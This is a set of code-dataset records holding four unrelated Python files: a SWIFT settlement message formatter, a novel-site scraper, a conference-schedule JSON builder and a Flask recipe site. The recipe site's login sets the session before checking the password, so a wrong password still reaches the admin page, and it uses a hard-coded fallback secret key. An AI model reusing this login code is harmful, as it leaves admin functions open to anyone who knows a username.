= rate\n rate_dict['qualifier'] = qualifier\n return rate_dict\n\n def _format_subsequenceb1_rate_92A(self, rate_values):\n \"\"\"returns formatted values of provided input\"\"\"\n rate = rate_values.get('rate')\n rate = FSecuritySettlementOutUtils.represent_negative_amount(rate)\n qualifier = rate_values.get('qualifier')\n rate_value = \":\" + str(qualifier) + '//' + str(rate)\n return rate_value\n\n def _setsubsequenceb1rate_92A(self, rate_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Rate.append(rate_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Rate[-1].swiftTag = \"92A\"\n\n # ------------------ type of financial instrument - 12C -----------------------\n\n def type_of_financial_instrument(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and CFI Code or ISITC Code\"\"\"\n type_of_financial_instrument_list = []\n type_of_financial_instrument_dict = {}\n type_of_financial_instrument_block = {}\n type_of_financial_instrument_block['INSTRUMENT_TYPE_CFI_CODE'] = None\n type_of_financial_instrument_block['INSTRUMENT_TYPE_ISITC_CODE'] = None\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = None\n\n type_of_financial_instrument_block['INSTRUMENT_TYPE_QUALIFIER'] = FSecuritySettlementOutUtils.get_instrument_type_qualifier()\n\n if self.cfi_code:\n type_of_financial_instrument_block['INSTRUMENT_TYPE_CFI_CODE'] = self.cfi_code\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = 'C'\n if self.isitc_code:\n type_of_financial_instrument_block['INSTRUMENT_TYPE_ISITC_CODE'] = self.isitc_code\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = 'A'\n\n if type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] == 'A':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self.type_of_instrument_12A(type_of_financial_instrument_block)\n elif type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] == 'C':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self.type_of_instrument_12C(type_of_financial_instrument_block)\n\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _format_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n type_of_financial_instrument_list = []\n for each_val in fin_ins_values:\n type_of_financial_instrument_dict = {}\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = type_of_instrument.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self._format_type_of_instrument_12A(type_of_instrument)\n else:\n type_of_financial_instrument_dict['TypeOfInstrument'] = self._format_type_of_instrument_12C(type_of_instrument)\n type_of_financial_instrument_dict['option'] = option\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _validate_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n type_of_financial_instrument_list = []\n for each_val in fin_ins_values:\n type_of_financial_instrument_dict = {}\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = each_val.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n val = self._validate_type_of_instrument_12A(type_of_instrument)\n else:\n val = self._validate_type_of_instrument_12C(type_of_instrument)\n type_of_financial_instrument_dict['TypeOfInstrument'] = val\n type_of_financial_instrument_dict['option'] = option\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _check_condition_set_type_of_financial_instrument(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in fin_ins_values:\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = each_val.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n self._settype_of_instrument_12A(type_of_instrument)\n else:\n self._settype_of_instrument_12C(type_of_instrument)\n\n def type_of_instrument_12A(self, instrument_type_dict):\n \"\"\"Returns a dictionary with values of Qualifier and ISITC Code\"\"\"\n type_of_financial_instrument_dict = {}\n instrument_type_code = instrument_type_dict['INSTRUMENT_TYPE_ISITC_CODE']\n qualifier = instrument_type_dict['INSTRUMENT_TYPE_QUALIFIER']\n type_of_financial_instrument_dict['instrument_type_code'] = instrument_type_code\n type_of_financial_instrument_dict['qualifier'] = qualifier\n type_of_financial_instrument_dict['option'] = 'A'\n return type_of_financial_instrument_dict\n\n def _format_type_of_instrument_12A(self, fin_ins_values):\n \"\"\"returns formatted values of provided input\"\"\"\n instrument_type_code = fin_ins_values.get('instrument_type_code')\n qualifier = fin_ins_values.get('qualifier')\n type_of_instrument = \":\" + str(qualifier) + '/ISIT/' + str(instrument_type_code)\n return type_of_instrument\n\n def _settype_of_instrument_12A(self, fin_ins_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_A.append(fin_ins_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_A[-1].swiftTag = \"12A\"\n\n def type_of_instrument_12C(self, instrument_type_dict):\n \"\"\"Returns a dictionary with values of Qualifier and CFI Code\"\"\"\n type_of_instrument_dict = {}\n instrument_type_code = instrument_type_dict['INSTRUMENT_TYPE_CFI_CODE']\n qualifier = instrument_type_dict['INSTRUMENT_TYPE_QUALIFIER']\n type_of_instrument_dict['instrument_type_code'] = instrument_type_code\n type_of_instrument_dict['qualifier'] = qualifier\n type_of_instrument_dict['option'] = 'C'\n return type_of_instrument_dict\n\n def _format_type_of_instrument_12C(self, fin_ins_values):\n \"\"\"returns formatted values of provided input\"\"\"\n instrument_type_code = fin_ins_values.get('instrument_type_code')\n qualifier = fin_ins_values.get('qualifier')\n type_of_instrument = \":\" + str(qualifier) + '//' + str(instrument_type_code)\n return type_of_instrument\n\n def _settype_of_instrument_12C(self, fin_ins_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_C.append(fin_ins_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_C[-1].swiftTag = \"12C\"\n\n","sub_path":"Extensions/FSwiftSecuritySettlement/FPythonCode/FSecuritySettlementOutBase.py","file_name":"FSecuritySettlementOutBase.py","file_ext":"py","file_size_in_byte":45303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"403578682","text":"import requests # requests是python的一个轻量级爬虫框架\nfrom bs4 import BeautifulSoup as bs # BeautifulSoup这个名字太长了,简写成bs\n\n# 打开网页函数\ndef get_response(url):\n headers = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36\"}\n response = requests.get(url, headers)\n #response.encoding = 'utf-8'\n response.encoding = 'gbk'\n return response\n\n# 获取网页中a标签中的文本和链接信息\n# 参数说明(顺序对应下面的参数位置):\n# 根路径(需要和相对路径进行拼接),需要解析的url、解析式、链接的键名、文本信息的键名、传入的字典\ndef get_text_and_link(base_url,url,req,link_name,text_name,items):\n response = get_response(url)\n soup = bs(response.text, 'lxml')\n #print(len(soup.select(req)))\n for item in soup.select(req):\n # 由于获取到的链接是相对路径,故此需要进行url拼接组成链接\n items[link_name] = base_url + item['href']\n items[text_name] = item.text\n yield items\n\n# 获取内容函数\ndef get_content(url,req_start,req_end,items):\n response = get_response(url)\n\n # 把获取到的文本信息用html的解析器解析\n soup = bs(response.text, 'html.parser')\n # 通过传入的解析式解析小说正文,这里的写法最好用肉眼观察\n # 这里有两个解析式,是因为获取一大段内容需要 开始 和 结束 标记\n\n content = soup.find(req_start,class_=req_end).strings\n # 把书名、章节名、小说正文内容传入writeFile函数进行保存\n writeFile(items['book_name'],items['chapter_name'],content)\n\n# 保存文件函数\ndef writeFile(book_name,title,content):\n # 把书名后面加上.txt保证文件是txt类型文件\n # 写入方式是 a 添加写法 w是覆盖写法 编码格式是utf-8\n with open(book_name + '.txt','a',encoding='utf-8')as txt_file:\n #设置文件编码,避免写入时乱码\n # 每一次写入章节名时进行换行\n txt_file.write('\\n'+title+'\\n')\n for line in content:\n #content是一个生成器,采用for循环逐次写入文件\n txt_file.write(line)\n print(f'{ title } 写入到{ book_name }.txt 完成')\n\n# 主函数\ndef main():\n # 根url 根网址\n base_url = 'https://www.gulongwang.com'\n # 生成一个空字典,来接收内容\n items = {}\n # 获取书名的列表\n # 第一次从首页获取书的书名和书的链接\n # 函数传入的参数 根路径,首页的地址、解析式、赋予书的链接名的键名、赋予书名的键名、字典\n book_links = get_text_and_link(base_url,base_url,'p a','book_link','book_name',items)\n # 从书名的列表逐一获取出每一本书的书名和书的链接\n for item in book_links:\n # 第二次获取书的章节名和小说的正文链接\n # 函数传入的参数有跟路径、书的链接、章节列表的解析式、章节链接的键名、章节的名字、字典\n chapter = get_text_and_link(base_url,item['book_link'],'#right li a','chapter_link','chapter_name',items)\n for item in chapter:\n # 打印每一章节的章节名和章节链接\n get_content(item['chapter_link'],'div','nr_con',items)\n\n # 当.py文件运行时,在if __name__ == \"__main__\":下的的代码将会运行\n # 当该文件被当成模块运行时,if __name__ == \"__main__\":下的代码不会被运行\nif __name__ == \"__main__\":\n main()\n","sub_path":"request_spider/requests_4.py","file_name":"requests_4.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"472912702","text":"import sys, json, csv, re, time\n\npapers = {}\nsessions = {}\nschedule = []\n\ndt_format='%m/%d/%Y'\n\ndef construct_id(s):\n return re.sub(r'\\W+', '_', s)\n\ndef get_start_time(s_time):\n s = s_time.split('-')[0].strip()\n return int(re.match(r'\\d+', s).group())\n return s\n\ndef get_date_time(s_date, dt_format='%m/%d/%Y'):\n if s_date == \"7/12/2016\":\n return time.strptime('07/12/2016', dt_format)\n if s_date == '7/13/2016':\n return time.strptime('07/13/2016', dt_format)\n if s_date == '7/14/2016':\n return time.strptime('07/14/2016', dt_format) \n if s_date == \"7/15/2016\":\n return time.strptime('07/15/2016', dt_format) \n #time_struct = time.strptime(s_date, dt_format)\n #return time_struct\n\ndef get_day(time_struct):\n return time.strftime(\"%A\", time_struct)\n\ndef get_date(time_struct):\n return time.strftime(\"%m/%d/%Y\", time_struct)\n\ndef get_class(s_time):\n v = get_start_time(s_time)\n if(v < 10 and v >= 7):\n return 'morning1'\n elif(v >= 8 and v < 12):\n return 'morning2'\n elif(v >= 12 and v < 15):\n return 'afternoon1'\n elif(v >= 15 and v < 18):\n return 'afternoon2'\n else:\n return 'evening'\n\ndef prepare_schedule(t_schedule):\n # sort schedule data\n for s_date in t_schedule: \n t_schedule[s_date] = sorted(\n t_schedule[s_date].items(), key = lambda x: get_start_time(x[0]))\n\n t_schedule = sorted(t_schedule.items(), key=lambda x: time.mktime(get_date_time(x[0], dt_format=dt_format)))\n for day_schedule in t_schedule:\n slots = []\n s_date = day_schedule[0]\n all_slots = day_schedule[1]\n for slot_info in all_slots:\n slot_time = slot_info[0]\n slot_sessions = slot_info[1]['sessions']\n slots.append({\n 'time': slot_time,\n 'sessions': slot_sessions,\n 'slot_class': get_class(slot_time),\n 'slot_id': construct_id(s_date + slot_time)\n })\n schedule.append({'date': get_date(get_date_time(s_date, dt_format=dt_format)), 'slots': slots, 'day': get_day(get_date_time(s_date, dt_format=dt_format))})\n\ndef prepare_data(data_file1):\n f1 = open(data_file1, 'rU')\n reader1 = csv.reader(f1)\n \n p_id = 1\n \n reader1.next()\n \n t_schedule = {}\n for row in reader1:\n paper_id = unicode(row[0], \"ISO-8859-1\")\n paper_title = unicode(row[2].decode('utf-8'))\n paper_authors = unicode(row[3].decode('utf-8'))\n keywords = unicode(row[4].decode('utf-8')).strip('\"')\n session = unicode(row[5].decode('utf-8'))\n session_chair = unicode(row[6].decode('utf-8'))\n s_date = unicode(row[7], \"ISO-8859-1\")\n s_time = unicode(row[8], \"ISO-8859-1\")\n room = unicode(row[9], \"ISO-8859-1\")\n paper_abstract = unicode(row[10], \"ISO-8859-1\")\n \n if paper_abstract.strip() == '-':\n paper_abstract = ''\n \n if paper_title.strip() == '-' or paper_title.strip() == '':\n paper_title = session\n \n if session_chair.strip() != '-' and session_chair.strip() != '':\n session = session + ' - Chair: ' + session_chair\n \n type = unicode(row[1], \"ISO-8859-1\")\n if type == \"Main Track\" or type == \"AI&Web Track\":\n type = 'paper'\n elif 'posters' in session.lower():\n type = 'poster'\n elif 'demos' in session.lower():\n type = 'demo'\n else:\n type = 'talk'\n\n # prepare papers data\n papers[paper_id] = {\n 'title': paper_title,\n 'type': type,\n }\n \n if keywords.strip() != '-' and keywords.strip() != '':\n papers[paper_id]['keywords'] = keywords\n \n papers[paper_id]['abstract'] = paper_abstract\n \n \n \n paper_authors = re.sub(' and ', ', ', paper_authors)\n \n \n if paper_authors.strip() != '-' and paper_authors.strip() != '':\n papers[paper_id]['authors'] = [{'name': name.strip()} for name in paper_authors.split(',') if name.strip() != '']\n else:\n if session_chair != '-':\n papers[paper_id]['authors'] = [session_chair]\n papers[paper_id]['authors'] = []\n \n \n # prepare sessions data\n s_id = construct_id(session)\n if(s_id in sessions):\n sessions[s_id]['submissions'].append(paper_id)\n else:\n sessions[s_id] = {\n 'submissions': [paper_id], 's_title': session, 'room': room, 'time': s_time, 'date': s_date}\n\n p_id += 1\n\n # prepare schedule data\n for session in sessions:\n s_info = sessions[session]\n s_date = s_info['date']\n s_time = s_info['time']\n s_data = {'session': session, 'room': s_info['room']}\n if s_date in t_schedule:\n if s_time in t_schedule[s_date]:\n t_schedule[s_date][s_time]['sessions'].append(s_data)\n else:\n t_schedule[s_date][s_time] = {'time': s_time, 'sessions':[s_data] }\n else:\n t_schedule[s_date] = {s_time: {'time': s_time, 'sessions':[s_data]}}\n\n prepare_schedule(t_schedule)\n\n\ndef main():\n conf = sys.argv[2]\n data_file1 = sys.argv[1]\n prepare_data(data_file1)\n # write files\n p = open('data/' + conf + '/papers.json','w')\n p.write(json.dumps(papers, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf + '/data/papers.json','w')\n p.write('entities='+json.dumps(papers, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf + '/data/sessions.json','w')\n p.write('sessions='+json.dumps(sessions, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf +'/data/schedule.json','w')\n p.write('schedule='+json.dumps(schedule, indent=2, sort_keys=True))\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/ijcai2016/prepare_json.py","file_name":"prepare_json.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"526462594","text":"import os\nimport json\nimport pymysql\nimport pymongo\nfrom datetime import datetime\nfrom flask import Flask, render_template, request, flash, redirect, session, url_for, abort\nfrom flask_pymongo import PyMongo\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport json\nfrom bson import json_util\nfrom bson.json_util import dumps\nimport re\nimport bcrypt\n\n\napp = Flask(__name__)\napp.secret_key = os.getenv(\"SECRET\", \"recipechat\")\n\n\n# Connection with MongoDB\napp.config[\"MONGO_DBNAME\"] = \"SimaRecipes\"\napp.config[\"MONGO_URI\"] = os.getenv(\"MONGO_URI\", \"mongodb://localhost\")\n\n\n# Variable to connected MongoDB database\nrecipe = PyMongo(app)\n\n\ndef mongo_connect(url):\n \"\"\"MongoDB connection\"\"\"\n try:\n conn = pymongo.MongoClient(url)\n #print(\"Mongo is Connected!\")\n return conn\n except pymongo.errors.ConnectionFailure as e:\n print(\"Could not connect to MongoDB: %s\") % e\n\n# Empty array to store messages\nmessages = []\n\n\n# for CHAT messages (chat.html)\ndef add_messages(username, message):\n \"\"\"Add messages to the messages list\"\"\"\n now = datetime.now().strftime(\"%H:%M:%S\")\n #messages_dict = {\"timestamp\": now, \"from\": username, \"message\": message}\n messages.append({\"timestamp\": now, \"from\": username, \"message\": message})\n \n\n# dashboard (index.html)\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", \n recipe_chicken = recipe.db.recipes.find(), # Variable to count Chicken recipes in database\n recipe_veg = recipe.db.recipes.find(), # Variable to count Vegetable recipes in database\n recipe_lamb = recipe.db.recipes.find(), # Variable to count Lamb recipes in database\n recipe_seafood = recipe.db.recipes.find(), # Variable to count Sea Food recipes in database\n recipe_beef = recipe.db.recipes.find(), # Variable to count Beef recipes in database\n recipe_healthy = recipe.db.recipes.find(), # Variable to count Healthy recipes in database\n recipe_vegan = recipe.db.recipes.find(), # Variable to count Vegan recipes in database\n recipe_pork = recipe.db.recipes.find(), # Variable to count Pork recipes in database\n recipe_25 = recipe.db.recipes.find(), # Variable to count recipes which can be ready under 30 mins in database\n recipe_35 = recipe.db.recipes.find(), # Variable to count recipes which takes over 30 mins to ready in database\n recipe_amc = recipe.db.recipes.find(), # Variable to count American Cuisine recipes in database\n recipe_auc = recipe.db.recipes.find(), # Variable to count Australian Cuisine recipes in database\n recipe_cdc = recipe.db.recipes.find(), # Variable to count Canadian Cuisine recipes in database\n recipe_cnc = recipe.db.recipes.find(), # Variable to count Chinese Cuisine recipes in database\n recipe_euc = recipe.db.recipes.find(), # Variable to count European Cuisine recipes in database\n recipe_fec = recipe.db.recipes.find(), # Variable to count Far Eastern Cuisine recipes in database\n recipe_mdc = recipe.db.recipes.find(), # Variable to count Meditarrenean Cuisine recipes in database\n recipe_mec = recipe.db.recipes.find(), # Variable to count Middle Eastern Cuisine recipes in database\n recipe_nac = recipe.db.recipes.find(), # Variable to count North African Cuisine recipes in database\n recipe_safc = recipe.db.recipes.find(), # Variable to count South African Cuisine recipes in database\n recipe_samc = recipe.db.recipes.find(), # Variable to count South American Cuisine recipes in database\n recipe_sasc = recipe.db.recipes.find()) # Variable to count South Asian Cuisine recipes in database\n \n\n@app.route(\"/SimaRecipes/recipes\")\ndef simasrecipe_project():\n projects = recipe.find(projection = recipe.FIELDS)\n json_projects = []\n for project in projects:\n json_projects.append(project)\n json_projects = json.dumps(json_projects, default=json_util.default)\n \n return render_template(\"index.html\", json_projects=json_projects)\n \n\n# Recipes page (recipes.html) \n@app.route(\"/recipes\")\ndef recipes():\n \n return render_template(\"recipes.html\", \n page_title=\"Recipes\", \n recipes_veg = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegetable Recipes in database\n recipes_chick = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chicken Recipes in database\n recipes_lamb = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Lamb Recipes in database\n recipes_seafood = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Sea Food Recipes in database\n recipes_beef = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Beef Recipes in database\n recipes_healthy = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Healthy Recipes in database\n recipes_vegan = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegan Recipes in database\n recipes_pork = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Pork Recipes in database\n recipes_amc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all American Cuisine Recipes in database\n recipes_auc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Australian Cuisine Recipes in database\n recipes_cdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Canadian Cuisine Recipes in database\n recipes_cnc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chinese Cuisine Recipes in database\n recipes_euc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all European Cuisine Recipes in database\n recipes_fec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Far Eastern Cuisine Recipes in database\n recipes_mdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Mediterranean Cuisine Recipes in database\n recipes_mec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Middle Eastern Cuisine Recipes in database\n recipes_nac = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all North African Cuisine Recipes in database\n recipes_safc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South African Cuisine Recipes in database\n recipes_samc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South American Cuisine Recipes in database\n recipes_sasc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South Asian Cuisine Recipes in database\n check_veg = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegetable Recipes in database\n check_chick = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chicken Recipes in database\n check_lamb = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Lamb Recipes in database\n check_seafood = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Sea Food Recipes in database\n check_beef = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Beef Recipes in database\n check_healthy = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Healthy Recipes in database\n check_vegan = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegan Recipes in database\n check_pork = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Pork Recipes in database\n check_amc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all American Cuisine Recipes in database\n check_auc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Australian Cuisine Recipes in database\n check_cdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Canadian Cuisine Recipes in database\n check_cnc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chinese Cuisine Recipes in database\n check_euc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all European Cuisine Recipes in database\n check_fec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Far Eastern Cuisine Recipes in database\n check_mdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Mediterranean Cuisine Recipes in database\n check_mec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Middle Eastern Cuisine Recipes in database\n check_nac = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all North African Cuisine Recipes in database\n check_safc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South African Cuisine Recipes in database\n check_samc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South American Cuisine Recipes in database\n check_sasc = recipe.db.recipes.find().sort('recipe_name')) # Variable to list all South Asian Cuisine Recipes in database\n\n\n# Contact Us page (contact.html)\n@app.route(\"/contact\", methods=['POST', 'GET'])\ndef contact():\n if request.method == 'POST':\n \n # to display a verification message for sent email\n flash(\"Thanks {}, we have received your message!\".format(\n request.form[\"name\"]\n ))\n #print(request.form[\"name\"])\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n# chat page (chat.html)\n@app.route(\"/chat\", methods = [\"GET\", \"POST\"])\ndef chat():\n if request.method == \"POST\":\n \n # To verify username in exiting session\n session[\"username\"] = request.form[\"chatname\"]\n \n if \"username\" in session:\n #return redirect (session[\"username\"])\n # redirect to chat page\n return redirect (url_for(\"user\", username = session[\"username\"]))\n \n return render_template(\"chat.html\")\n\n\n# Username input (chat.html) \n@app.route(\"/chat/\", methods=[\"GET\", \"POST\"])\ndef user(username):\n \n # Display chat Messages\n if request.method == \"POST\":\n username = session[\"username\"] # Add username into variable\n message = request.form[\"chatmessage\"] # store message(s) into variable\n add_messages(username, message) # stored username and message output\n #return redirect(session[\"username\"])\n return redirect (url_for(\"user\", username = session[\"username\"]))\n \n return render_template(\"chat.html\", username = username, chat_messages = messages)\n\n\n@app.route('/newuser')\ndef newuser():\n return render_template('newuser.html')\n\n\n# Intermediate page between Login and admin\n@app.route('/loginuser')\ndef loginuser():\n '''return render_template(\"login.html\")'''\n if not session.get('logged_in'): # check whether someone id logged in or not\n return render_template('login.html') # redirect to login page\n else:\n return redirect(url_for('admin')) # redirect to admin page\n\n\n# Login page (login.html)\n@app.route('/login', methods=['POST'])\ndef login():\n users = recipe.db.users\n login_user = users.find_one({'name' : request.form['username']})\n \n if login_user:\n session['username'] = request.form['username']\n if bcrypt.hashpw(request.form['password'].encode('utf-8'), login_user['password'].encode('utf-8')) == login_user['password'].encode('utf-8'):\n session['username'] = request.form['username']\n session['logged_in'] = True\n return redirect(url_for('admin')) \n return redirect(url_for('admin'))\n return 'Invalid username/password combination'\n\n\n# Logout route (Logout button on top of the Admin page)\n@app.route(\"/logout\")\ndef logout():\n session['logged_in'] = False # make session deactive and logout the user\n return redirect(url_for('loginuser')) # redirect to intermediate page/route\n\n\n# Admin page (admin.html)\n@app.route(\"/admin\")\ndef admin():\n \n if 'username' in session:\n return render_template(\"admin.html\", page_title =\"Admin\",\n categories = recipe.db.categories.find(), # Variable to list all Categories in the Database for combo box for adding new recipes \n recipes = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Recipes in the Database for Admin page\n category = recipe.db.categories.find().sort('category_name'), # Variable to list all Categories in the Database for EDIT or DELETE on Admin page\n images = recipe.db.images.find().sort('recipe_image'), # Variable to list all Images in the Database for combo box for adding new recipes \n cuisines = recipe.db.cuisines.find().sort('cuisine_name'), # Variable to list all Cuisines in the Database for combo box for adding new recipes \n cuisines_list = recipe.db.cuisines.find().sort('cuisine_name'), # Variable to list all Cuisines in the Database for EDIT or DELETE on Admin page\n username = session[\"username\"])\n \n return render_template('login.html')\n \n \n# Insert user to database (admin.html)\n@app.route(\"/insert_user\", methods=[\"POST\",\"GET\"])\ndef insert_user():\n if request.method == 'POST':\n users = recipe.db.users\n existing_user = users.find_one({'name' : request.form['username']})\n \n if existing_user is None:\n hashpass = bcrypt.hashpw(request.form['password'].encode('utf-8'), bcrypt.gensalt())\n users.insert({'name' : request.form['username'], 'email' : request.form['useremail'], 'password' : hashpass})\n session['username'] = request.form['username']\n return redirect(url_for(\"admin\"))\n \n return 'Username Already Exists'\n \n return render_template('newuser.html')\n\n\n# Insert recipe to Database (admin.html)\n@app.route(\"/insert_recipe\", methods=[\"POST\"])\ndef insert_recipe():\n addrecipes = recipe.db.recipes\n addrecipes.insert_one(request.form.to_dict())\n return redirect(url_for(\"admin\"))\n \n \n# Insert category to database (admin.html)\n@app.route(\"/insert_category\", methods=[\"POST\"])\ndef insert_category():\n addcategory = recipe.db.categories\n addcategory.insert_one(request.form.to_dict())\n return redirect(url_for(\"admin\"))\n \n\n# Insert Cuisine to database (admin.html)\n@app.route(\"/insert_cuisine\", methods=[\"POST\"])\ndef insert_cuisine():\n addcuisine = recipe.db.cuisines\n addcuisine.insert_one(request.form.to_dict())\n return redirect(url_for(\"admin\"))\n\n\n# Edit recipe (admin.html)\n@app.route(\"/edit_recipe/\")\ndef edit_recipe(task_id):\n the_recipe = recipe.db.recipes.find_one({\"_id\": ObjectId(task_id)}) # fetch data from database with help of unique ID\n all_categories = recipe.db.categories.find() # Variable to list all categories in th databse\n all_images = recipe.db.images.find() # Variable to list all images in th databse\n all_cuisines = recipe.db.cuisines.find().sort('cuisine_name') # Variable to list all cuisines in th databse\n return render_template(\"editrecipe.html\", page_title=\"Edit Recipe\", \n recipe = the_recipe, # variable to store all fetched recipes \n categories = all_categories, # variable to store all fetched categories \n images = all_images, # variable to store all fetched images \n cuisines = all_cuisines) # variable to store all fetched cuisines \n \n# Edit Category (admin.html)\n@app.route(\"/edit_category/\")\ndef edit_category(cat_id):\n return render_template(\"editcategory.html\", \n page_title=\"Edit Category\", \n category = recipe.db.categories.find_one({'_id': ObjectId(cat_id)})) # Variable to fetch and store particular category base on uniquie ID\n \n# Edit Cuisine (admin.html)\n@app.route(\"/edit_cuisine/\")\ndef edit_cuisine(cus_id):\n return render_template(\"editcuisine.html\", \n page_title=\"Edit Cuisine\", \n cuisines = recipe.db.cuisines.find_one({'_id': ObjectId(cus_id)})) # Variable to fetch and store particular cuisine base on uniquie ID\n\n\n# Update recipe (editrecipe.html)\n@app.route(\"/update_recipe/\", methods=[\"POST\"])\ndef update_recipe(task_id):\n updaterecipe = recipe.db.recipes\n updaterecipe.update({'_id': ObjectId(task_id)}, # Update data in the database based on uniq ID\n {\n 'recipe_name': request.form.get('recipe_name'), # Fetch updated data from input field and store in the right field in the databse\n 'recipe_type': request.form.get('recipe_type'),\n 'recipe_image': request.form.get('recipe_image'),\n 'recipe_cuisine': request.form.get('recipe_cuisine'),\n 'ingredient_1': request.form.get('ingredient_1'),\n 'ingredient_2': request.form.get('ingredient_2'),\n 'ingredient_3': request.form.get('ingredient_3'),\n 'ingredient_4': request.form.get('ingredient_4'),\n 'ingredient_5': request.form.get('ingredient_5'),\n 'ingredient_6': request.form.get('ingredient_6'),\n 'ingredient_7': request.form.get('ingredient_7'),\n 'ingredient_8': request.form.get('ingredient_8'),\n 'ingredient_9': request.form.get('ingredient_9'),\n 'method_1': request.form.get('method_1'),\n 'method_2': request.form.get('method_2'),\n 'method_3': request.form.get('method_3'),\n 'method_4': request.form.get('method_4'),\n 'method_5': request.form.get('method_5'),\n 'method_6': request.form.get('method_6'),\n 'method_7': request.form.get('method_7'),\n 'method_8': request.form.get('method_8'),\n 'method_9': request.form.get('method_9'),\n 'create_on': request.form.get('create_on'),\n 'prep_time': request.form.get('prep_time'),\n 'cook_time': request.form.get('cook_time')\n })\n return redirect(url_for(\"admin\"))\n \n\n# Update Category (editcategory.html)\n@app.route(\"/update_category/\", methods=[\"POST\"])\ndef update_category(cat_id):\n updatecategory = recipe.db.categories\n updatecategory.update({'_id': ObjectId(cat_id)}, # Update data in the database based on uniq 